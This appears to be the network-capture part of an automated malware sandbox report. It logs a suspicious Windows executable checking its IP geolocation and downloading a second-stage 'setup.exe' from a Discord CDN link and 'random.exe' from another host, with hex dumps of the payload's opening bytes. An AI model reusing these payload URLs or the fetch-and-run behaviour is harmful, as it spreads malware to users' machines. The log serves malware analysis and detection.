Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.4	49824	185.22.66.16	80

Timestamp	Bytes transferred	Direction	Data
Aug 10, 2024 16:14:09.129801989 CEST	380	OUT	GET /updates/yd/yt_wrtzr_1/win/version.txt?KubbvdjJfOkOrksIlOLwwrZZFcTPifwjk HTTP/1.1 Accept: / Cache-Control: no-cache Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: www.rapidfilestorage.com Connection: Keep-Alive
Aug 10, 2024 16:14:09.941406965 CEST	383	IN	HTTP/1.1 200 OK Server: openresty Date: Sat, 10 Aug 2024 14:14:09 GMT Content-Type: text/plain Content-Length: 10 Connection: keep-alive Set-Cookie: slb_route=13db8a2aaddbafa89a4e74ec4a29bdac; Path=/; Secure; HttpOnly Last-Modified: Fri, 26 Jul 2024 10:59:34 GMT ETag: "66a38196-a" Accept-Ranges: bytes X-Resolver-IP: 185.22.66.16 X-Resolver-IP: 185.22.66.16 Data Raw: 32 2e 30 2e 30 2e 33 32 31 37 Data Ascii: 2.0.0.3217

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.4	49827	194.67.87.38	80

Timestamp	Bytes transferred	Direction	Data
Aug 10, 2024 16:14:10.015130043 CEST	372	OUT	GET /updates/yd/yt_wrtzr_1/win/version.txt?TCtDuRUdKYZTtiynHOebqmOBgoFjjnvzy HTTP/1.1 Accept: / Cache-Control: no-cache Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: helsinki-dtc.com Connection: Keep-Alive
Aug 10, 2024 16:14:10.699145079 CEST	264	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 10 Aug 2024 14:14:10 GMT Content-Type: text/plain Content-Length: 10 Last-Modified: Fri, 26 Jul 2024 11:11:16 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66a38454-a" Accept-Ranges: bytes Data Raw: 32 2e 30 2e 30 2e 33 32 31 37 Data Ascii: 2.0.0.3217

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.4	49829	13.32.145.29	80

Timestamp	Bytes transferred	Direction	Data
Aug 10, 2024 16:14:10.722863913 CEST	384	OUT	GET /updates/yd/yt_wrtzr_1/win/version.txt?rwPMUQxcTIPiQpiDrtjTaQVThGnaNHXkE HTTP/1.1 Accept: / Cache-Control: no-cache Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: skrptfiles.tracemonitors.com Connection: Keep-Alive
Aug 10, 2024 16:14:11.326047897 CEST	500	IN	HTTP/1.1 200 OK Content-Type: text/plain Content-Length: 10 Connection: keep-alive Date: Sat, 10 Aug 2024 00:15:37 GMT Last-Modified: Fri, 26 Jul 2024 11:11:21 GMT ETag: "a4a16cb7322199d0dc098187d183288e" x-amz-server-side-encryption: AES256 Accept-Ranges: bytes Server: AmazonS3 X-Cache: Hit from cloudfront Via: 1.1 c64455167e397f58d6d4c8de3a78489c.cloudfront.net (CloudFront) X-Amz-Cf-Pop: CDG50-C2 X-Amz-Cf-Id: r66FihreT0v7gAeyrNvJ0lftKIHIJbkAiLXgZaPVdN6Szx_sbMSl-w== Age: 50315
Aug 10, 2024 16:14:11.454469919 CEST	10	IN	Data Raw: 32 2e 30 2e 30 2e 33 32 31 37 Data Ascii: 2.0.0.3217

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	104.26.8.59	443	7008	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-10 14:12:15 UTC	187	OUT	GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: api.myip.com
2024-08-10 14:12:15 UTC	567	IN	HTTP/1.1 200 OK Date: Sat, 10 Aug 2024 14:12:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4qGKhpnwxf5WkFEbhkoxUKRizzbwsbuFup9q8Wgh1VcZ%2F%2FGmISR%2BkAmwtSCxAIYBtfOIiL0Q5iQjWgMlDtIUUybs76qH8%2FstYeGcD42YUFDbaYY0vrJ6JH6slnXCfA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b10946e7bdf78d9-EWR
2024-08-10 14:12:15 UTC	62	IN	Data Raw: 33 38 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 63 22 3a 22 55 53 22 7d 0d 0a Data Ascii: 38{"ip":"8.46.123.33","country":"United States","cc":"US"}
2024-08-10 14:12:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49734	34.117.59.81	443	7008	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-10 14:12:16 UTC	236	OUT	GET /widget/demo/8.46.123.33 HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: ipinfo.io
2024-08-10 14:12:16 UTC	458	IN	HTTP/1.1 200 OK access-control-allow-origin: * Content-Length: 1025 content-type: application/json; charset=utf-8 date: Sat, 10 Aug 2024 14:12:16 GMT referrer-policy: strict-origin-when-cross-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-08-10 14:12:16 UTC	932	IN	Data Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 Data Ascii: { "input": "8.46.123.33", "data": { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level
2024-08-10 14:12:16 UTC	93	IN	Data Raw: 6b 20 41 62 75 73 65 20 44 65 73 6b 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 30 2f 32 34 22 2c 0a 20 20 20 20 20 20 22 70 68 6f 6e 65 22 3a 20 22 2b 31 2d 38 37 37 2d 38 38 36 2d 36 35 31 35 22 0a 20 20 20 20 7d 0a 20 20 7d 0a 7d Data Ascii: k Abuse Desk", "network": "8.46.123.0/24", "phone": "+1-877-886-6515" } }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49748	162.159.130.233	443	7008	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-10 14:12:22 UTC	373	OUT	HEAD /attachments/1114587923828985909/1271828116100222987/setup.exe?ex=66b8c1bc&is=66b7703c&hm=3ffe5bb23d054819ae2313e718a0ec64e2ade31a9965e8b041f7e231be3fcbde& HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Cache-Control: no-cache Host: cdn.discordapp.com Connection: Keep-Alive
2024-08-10 14:12:22 UTC	1194	IN	HTTP/1.1 200 OK Date: Sat, 10 Aug 2024 14:12:22 GMT Content-Type: application/x-msdos-program Content-Length: 7644814 Connection: close CF-Ray: 8b109496ee521869-EWR CF-Cache-Status: HIT Accept-Ranges: bytes, bytes Cache-Control: public, max-age=31536000 Content-Disposition: attachment; filename="setup.exe" ETag: "381f228fc02e9927f1f2145b8ad5696e" Expires: Sun, 10 Aug 2025 14:12:22 GMT Last-Modified: Sat, 10 Aug 2024 13:50:52 GMT Vary: Accept-Encoding alt-svc: h3=":443"; ma=86400 x-goog-generation: 1723297852360471 x-goog-hash: crc32c=mdc5Tw== x-goog-hash: md5=OB8ij8AumSfx8hRbitVpbg== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 7644814 x-guploader-uploadid: AHxI1nOv_H0l3iMV9MJyeV3-i5fLvtkGSL-TzLEYBA9c8m5b1FdbjdvadC0PeAZVi5grOxGm4n8 X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: __cf_bm=TQkFGfEYadGUE57Kfip1wvX0OHkU_Ir9uw4pAsm89UU-1723299142-1.0.1.1-EMUSdkltkyg45WsAAuxNg9RrPCV2qvYpSr1oeNLMcDnmI4_1mvkyehqC3u6IicirJoNCt26JZkx8xXFXqNvbzw; path=/; expires=Sat, 10-Aug-24 14:42:22 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
2024-08-10 14:12:22 UTC	519	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 58 78 44 36 78 45 6e 5a 66 4f 72 44 64 6e 75 48 68 53 33 67 25 32 46 4d 6c 36 49 43 54 56 44 6a 4d 51 61 67 34 36 49 6c 6d 51 74 67 79 4e 6c 54 31 74 30 38 42 5a 79 46 4b 6f 6a 53 6f 67 76 44 25 32 42 32 45 43 53 6b 48 37 46 71 65 52 62 66 45 4a 56 51 75 39 71 43 34 75 55 6a 32 55 6c 43 62 25 32 42 68 6f 69 4e 25 32 46 42 31 4e 67 67 45 70 7a 46 46 76 45 6e 6c 7a 42 7a 74 65 58 43 30 4e 4d 7a 41 25 32 46 53 5a 35 42 46 4f 6d 51 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XxD6xEnZfOrDdnuHhS3g%2FMl6ICTVDjMQag46IlmQtgyNlT1t08BZyFKojSogvD%2B2ECSkH7FqeRbfEJVQu9qC4uUj2UlCb%2BhoiN%2FB1NggEpzFFvEnlzBzteXC0NMzA%2FSZ5BFOmQ%3D%3D"}],"group":"cf-nel","max_a

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49750	162.0.209.124	443	7008	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-10 14:12:22 UTC	202	OUT	GET /temp/random.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: helleaa.com Cache-Control: no-cache
2024-08-10 14:12:23 UTC	115	IN	HTTP/1.1 403 Forbidden content-length: 93 cache-control: no-cache content-type: text/html connection: close
2024-08-10 14:12:23 UTC	93	IN	Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49754	162.159.130.233	443	7008	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-10 14:12:23 UTC	624	OUT	GET /attachments/1114587923828985909/1271828116100222987/setup.exe?ex=66b8c1bc&is=66b7703c&hm=3ffe5bb23d054819ae2313e718a0ec64e2ade31a9965e8b041f7e231be3fcbde& HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Cache-Control: no-cache Host: cdn.discordapp.com Connection: Keep-Alive Cookie: __cf_bm=TQkFGfEYadGUE57Kfip1wvX0OHkU_Ir9uw4pAsm89UU-1723299142-1.0.1.1-EMUSdkltkyg45WsAAuxNg9RrPCV2qvYpSr1oeNLMcDnmI4_1mvkyehqC3u6IicirJoNCt26JZkx8xXFXqNvbzw; _cfuvid=kuQ1QPcubEVwRLbFnIoZ7sfufmJbnwwA_AHPO2yuLiM-1723299142296-0.0.1.1-604800000
2024-08-10 14:12:23 UTC	1284	IN	HTTP/1.1 200 OK Date: Sat, 10 Aug 2024 14:12:23 GMT Content-Type: application/x-msdos-program Content-Length: 7644814 Connection: close CF-Ray: 8b10949ccc1e8c84-EWR CF-Cache-Status: HIT Accept-Ranges: bytes, bytes Age: 1 Cache-Control: public, max-age=31536000 Content-Disposition: attachment; filename="setup.exe" ETag: "381f228fc02e9927f1f2145b8ad5696e" Expires: Sun, 10 Aug 2025 14:12:23 GMT Last-Modified: Sat, 10 Aug 2024 13:50:52 GMT Vary: Accept-Encoding alt-svc: h3=":443"; ma=86400 x-goog-generation: 1723297852360471 x-goog-hash: crc32c=mdc5Tw== x-goog-hash: md5=OB8ij8AumSfx8hRbitVpbg== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 7644814 x-guploader-uploadid: AHxI1nOv_H0l3iMV9MJyeV3-i5fLvtkGSL-TzLEYBA9c8m5b1FdbjdvadC0PeAZVi5grOxGm4n8 X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bKYUp0tbcd2L%2BrOXxTc%2FkgTdF1Kcemidj%2BIV2csu0EKQ3evWhZHWb7cSz0vYQqrfYdKpgjFZR2GiPgWMcT1O6hvnWGmY3e6apX8nErWuCjv1dO%2FeEUkreeO0A8qU8mtlXSjs5A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare
2024-08-10 14:12:23 UTC	85	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 Data Ascii: MZ@!L!This pr
2024-08-10 14:12:23 UTC	1369	IN	Data Raw: 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd e1 1d 57 99 80 73 04 99 80 73 04 99 80 73 04 1a 9c 7d 04 80 80 73 04 af a6 79 04 d9 80 73 04 17 88 2c 04 98 80 73 04 99 80 72 04 21 80 73 04 1a 88 2e 04 90 80 73 04 af a6 78 04 d4 80 73 04 f6 f6 d9 04 9e 80 73 04 f6 f6 ed 04 98 80 73 04 5e 86 75 04 98 80 73 04 52 69 63 68 99 80 73 04 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f7 53 e5 4c 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 9a 01 00 00 b0 00 00 00 00 00 00 04 4b 01 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 Data Ascii: ogram cannot be run in DOS mode.$Wsss}sys,sr!s.sxsss^usRichsPELSLK@
2024-08-10 14:12:23 UTC	1369	IN	Data Raw: 00 57 8d 4d cc 89 5d cc 89 5d d0 89 5d d4 e8 af 0f 00 00 39 5d ac c6 85 2c ff ff ff 01 0f 84 e0 02 00 00 8d 8d 54 ff ff ff e8 79 0f 00 00 bf 34 b3 41 00 8d 95 54 ff ff ff 8d 4d a8 89 bd 54 ff ff ff e8 65 2b 00 00 84 c0 75 19 38 5d 0b 75 0c ba 20 02 42 00 33 c9 e8 89 fe 00 00 6a 01 5b e9 21 01 00 00 68 14 02 42 00 8d 4d f0 e8 61 0a 00 00 8d 45 f0 8d 95 54 ff ff ff 50 8d 4d c0 e8 42 2e 00 00 ff 75 f0 e8 63 28 00 00 8d 4d f0 c7 04 24 fc 01 42 00 e8 38 0a 00 00 8d 45 f0 8d 95 54 ff ff ff 50 8d 4d d8 e8 19 2e 00 00 ff 75 f0 e8 3a 28 00 00 8d 4d f0 c7 04 24 e8 01 42 00 e8 0f 0a 00 00 8d 45 f0 8d 95 54 ff ff ff 50 8d 8d 20 ff ff ff e8 ed 2d 00 00 ff 75 f0 e8 0e 28 00 00 59 ba e0 01 42 00 8b 8d 20 ff ff ff e8 b0 28 00 00 85 c0 75 06 88 9d 2c ff ff ff 68 cc 01 42 Data Ascii: WM]]]9],Ty4ATMTe+u8]u B3j[!hBMaETPMB.uc(M$B8ETPM.u:(M$BETP -u(YB (u,hB
2024-08-10 14:12:23 UTC	187	IN	Data Raw: 59 e9 a1 01 00 00 8b 85 0c ff ff ff ff 75 d8 89 45 08 e8 7e 23 00 00 ff 75 c0 e8 76 23 00 00 59 e9 2e 02 00 00 39 5d d0 75 56 68 d0 00 42 00 8d 4d cc e8 dd 05 00 00 8d 55 cc 8d 8d 48 ff ff ff e8 cc 02 00 00 8b 08 e8 29 41 00 00 ff b5 48 ff ff ff f6 d8 1a c0 fe c0 88 45 ff e8 35 23 00 00 38 5d ff 59 74 1a 38 5d 0b 0f 85 39 01 00 00 ba a0 00 42 00 33 c9 e8 11 f9 00 00 e9 28 01 00 00 8d 85 3c ff ff ff 8d 4d c0 50 e8 4b 05 00 00 8d 4d c0 e8 6d 45 00 00 68 94 00 42 00 8d 4d f0 e8 d5 04 00 00 8d 45 c0 8d 4d cc 50 8d 45 f0 50 e8 9b 06 00 00 ff 75 f0 e8 d9 22 00 Data Ascii: YuE~#uv#Y.9]uVhBMUH)AHE5#8]Yt8]9B3(<MPKMmEhBMEMPEPu"
2024-08-10 14:12:23 UTC	1369	IN	Data Raw: 00 ff 75 c0 e8 d1 22 00 00 59 59 68 8c 00 42 00 8d 4d f0 e8 a6 04 00 00 8d 85 3c ff ff ff 8d 4d cc 50 8d 45 f0 50 e8 69 06 00 00 ff 75 f0 e8 a7 22 00 00 39 5d e8 59 74 16 6a 20 8d 4d cc e8 b3 05 00 00 8d 45 e4 8d 4d cc 50 e8 d2 05 00 00 8d 45 cc 8d 95 30 ff ff ff 50 8d 8d 48 ff ff ff c7 85 cc fe ff ff 44 00 00 00 89 9d d0 fe ff ff 89 9d d4 fe ff ff 89 9d d8 fe ff ff 89 9d f8 fe ff ff 66 89 9d fe fe ff ff 89 9d 00 ff ff ff e8 df 0d 00 00 8b d0 8d 8d 20 ff ff ff e8 b6 01 00 00 ff b5 48 ff ff ff e8 2f 22 00 00 59 8d 85 10 ff ff ff 50 8d 85 cc fe ff ff 50 53 53 53 53 53 53 ff b5 20 ff ff ff 53 ff 15 8c b0 41 00 85 c0 0f 85 a3 00 00 00 38 5d 0b 75 07 33 c9 e8 84 f8 00 00 ff b5 20 ff ff ff e8 ee 21 00 00 59 ff 75 84 ff d6 ff 75 84 e8 e0 21 00 00 ff b5 3c ff ff Data Ascii: u"YYhBM<MPEPiu"9]Ytj MEMPE0PHDf H/"YPPSSSSSS SA8]u3 !Yuu!<
2024-08-10 14:12:23 UTC	1369	IN	Data Raw: 55 8b ec 51 56 8b f1 57 8b 7d 08 8b 06 33 c9 89 4e 04 89 4d fc 66 89 08 66 39 0f 74 0c 8b c7 ff 45 fc 40 40 66 39 08 75 f6 ff 75 fc 8b ce e8 22 04 00 00 8b 06 66 8b 0f 8d 57 02 66 89 08 40 40 66 85 c9 74 0c 66 8b 0a 66 89 08 40 40 42 42 eb ef 8b 45 fc 5f 89 46 04 8b c6 5e c9 c2 04 00 56 57 8b 7c 24 0c 8b f1 3b fe 74 2b 8b 06 83 66 04 00 66 83 20 00 ff 77 04 e8 d8 03 00 00 8b 0f 8b 06 66 8b 11 66 89 10 40 40 41 41 66 85 d2 75 f1 8b 47 04 89 46 04 8b c6 5f 5e c2 04 00 56 8b f1 6a 01 e8 02 04 00 00 8b 46 04 8b 0e 66 8b 54 24 08 66 89 14 41 ff 46 04 8b 46 04 8b 0e 66 83 24 41 00 8b c6 5e c2 04 00 56 57 8b 7c 24 0c 8b f1 ff 77 04 e8 d1 03 00 00 8b 46 04 8b 16 8b 0f 8d 04 42 66 8b 11 66 89 10 40 40 41 41 66 85 d2 75 f1 8b 47 04 5f 01 46 04 8b c6 5e c2 04 00 55 Data Ascii: UQVW}3NMff9tE@@f9uu"fWf@@ftff@@BBE_F^VW\|$;t+ff wff@@AAfuGF_^VjFfT$fAFFf$A^VW\|$wFBff@@AAfuG_F^U
2024-08-10 14:12:23 UTC	1369	IN	Data Raw: 1b 8b 17 8b 5d e4 66 8b 14 10 66 89 14 4b 41 40 40 3b ce 7c ec 8b 45 e4 8b 4d 08 66 83 24 70 00 8d 45 e4 50 89 75 e8 e8 41 fa ff ff ff 75 e4 e8 f4 17 00 00 59 8b 4d f4 8b 45 08 5f 5e 5b 64 89 0d 00 00 00 00 c9 c2 0c 00 55 8b ec 8b 45 08 53 56 57 8b 70 04 85 f6 75 05 8b 45 0c eb 4a 8b 51 04 8b 45 0c 3b c2 7d 3d 33 d2 85 f6 7e 27 8d 34 00 8d 3c 02 3b 79 04 7d 1c 8b 7d 08 8b 19 8b 3f 66 8b 1c 1e 66 3b 1c 57 75 0b 8b 7d 08 42 46 46 3b 57 04 7c dc 8b 75 08 8b 76 04 3b d6 74 09 40 3b 41 04 7c c3 83 c8 ff 5f 5e 5b 5d c2 08 00 b8 4c 91 41 00 e8 27 16 01 00 83 ec 0c 8d 45 e8 56 8b f1 50 e8 67 02 00 00 83 65 fc 00 50 8b ce e8 8e 01 00 00 ff 75 e8 e8 4c 17 00 00 59 5e 8b 4d f4 64 89 0d 00 00 00 00 c9 c3 b8 60 91 41 00 e8 ec 15 01 00 83 ec 0c 8d 45 e8 56 8b f1 50 e8 Data Ascii: ]ffKA@@;\|EMf$pEPuAuYME_^[dUESVWpuEJQE;}=3~'4<;y}}?ff;Wu}BFF;W\|uv;t@;A\|_^[]LA'EVPgePuLY^Md`AEVP
2024-08-10 14:12:23 UTC	1369	IN	Data Raw: 26 8b 46 0c 8d 4d e8 ff 34 b8 e8 07 f6 ff ff 8b 4d e8 e8 b8 21 00 00 6a 5c 8d 4d e8 e8 ca f5 ff ff 47 3b 7e 08 7c da ff 75 e8 e8 a0 12 00 00 59 5f 8b 4d f4 5e 64 89 0d 00 00 00 00 c9 c2 04 00 b8 1b 92 41 00 e8 3d 11 01 00 81 ec a0 00 00 00 53 56 8b 75 08 57 8d 8e a8 00 00 00 e8 52 05 00 00 84 c0 74 0a b8 04 40 00 80 e9 9e 04 00 00 8b 46 4c 33 db 3b c3 74 09 8b 08 50 ff 51 08 89 5e 4c 66 89 5d a8 66 89 5d aa 8b 46 0c 8b 7d 0c 8d 55 a8 89 5d fc 8b 08 52 6a 03 57 50 ff 51 18 3b c3 74 04 8b f0 eb 40 6a 03 8d 4d e8 89 5d e8 89 5d ec 89 5d f0 e8 e9 f8 ff ff 66 39 5d a8 c6 45 fc 01 75 0e 8d 46 50 8d 4d e8 50 e8 dd f4 ff ff eb 33 66 83 7d a8 08 74 21 ff 75 e8 e8 ee 11 00 00 59 be 05 40 00 80 83 4d fc ff 8d 4d a8 e8 74 35 00 00 8b c6 e9 13 04 00 00 ff 75 b0 8d 4d Data Ascii: &FM4M!j\MG;~\|uY_M^dA=SVuWRt@FL3;tPQ^Lf]f]F}U]RjWPQ;t@jM]]]f9]EuFPMP3f}t!uY@MMt5uM
2024-08-10 14:12:23 UTC	1369	IN	Data Raw: 89 01 8b 08 ff 51 04 33 c0 eb 05 b8 02 40 00 80 5d c2 0c 00 8b 4c 24 04 ff 49 04 8b 41 04 75 0d 85 c9 74 07 8b 01 6a 01 ff 50 18 33 c0 c2 04 00 56 8b f1 e8 14 00 00 00 f6 44 24 08 01 74 07 56 e8 31 0d 00 00 59 8b c6 5e c2 04 00 c7 01 54 b3 41 00 83 c1 08 e9 f5 2b 00 00 53 56 8b f1 56 ff 15 a0 b0 41 00 8a 5e 18 56 ff 15 9c b0 41 00 8a c3 5e 5b c3 ff 71 28 e8 fa 0c 00 00 59 c3 83 7c 24 08 00 8b 4c 24 04 0f 94 c0 88 41 34 33 c0 c2 08 00 53 33 db 39 5c 24 0c 56 8b 74 24 0c 74 38 8b 46 4c 3b c3 74 09 8b 08 50 ff 51 08 89 5e 4c 8b 44 24 10 48 74 09 c6 86 e0 00 00 00 01 eb 11 ff 35 84 02 42 00 8d 8e e4 00 00 00 e8 24 ef ff ff b8 05 40 00 80 eb 42 39 5e 4c 74 1b 8b 4e 48 8d 46 38 50 83 c1 08 e8 65 2e 00 00 8b 4e 48 e8 f7 37 00 00 3b c3 75 22 8b 46 4c 3b c3 74 09 Data Ascii: Q3@]L$IAutjP3VD$tV1Y^TA+SVVA^VA^[q(Y\|$L$A43S39\$Vt$t8FL;tPQ^LD$Ht5B$@B9^LtNHF8Pe.NH7;u"FL;t
2024-08-10 14:12:23 UTC	1369	IN	Data Raw: 8b 10 ff 52 1c ff 75 e4 89 46 60 e8 0d 08 00 00 ff 75 c0 e8 05 08 00 00 59 59 8b 4d f4 5f 5e 5b 64 89 0d 00 00 00 00 c9 c3 8b c1 33 c9 89 48 04 89 48 08 89 48 0c 8b 4c 24 04 89 48 10 c7 00 80 b3 41 00 c2 04 00 56 8b f1 e8 e0 0f 00 00 f6 44 24 08 01 74 07 56 e8 c2 07 00 00 59 8b c6 5e c2 04 00 8b 4c 24 04 e8 05 00 00 00 33 c0 c2 04 00 b8 c4 92 41 00 e8 5b 06 01 00 83 ec 0c 83 65 fc 00 53 56 8b 71 1c 57 83 c6 68 89 65 f0 89 4d ec 89 75 e8 c6 45 fc 01 e8 f8 fd ff ff 80 65 fc 00 8b ce e8 1f 00 00 00 8b 4d f4 5f 5e 64 89 0d 00 00 00 00 5b c9 c3 8b 45 ec c7 40 60 05 40 00 80 b8 26 33 40 00 c3 56 8b f1 8b 4e 3c e8 c0 fe 00 00 33 c0 38 46 38 74 12 50 50 68 01 04 00 00 ff 76 04 ff 15 dc b1 41 00 5e c3 c6 46 39 01 5e c3 8b 09 e9 cf ff ff ff b8 fc 92 41 00 e8 d4 05 Data Ascii: RuF`uYYM_^[d3HHHL$HAVD$tVY^L$3A[eSVqWheMuEeM_^d[E@`@&3@VN<38F8tPPhvA^F9^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49752	87.240.132.78	443	7008	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

Timestamp	Bytes transferred	Direction	Data
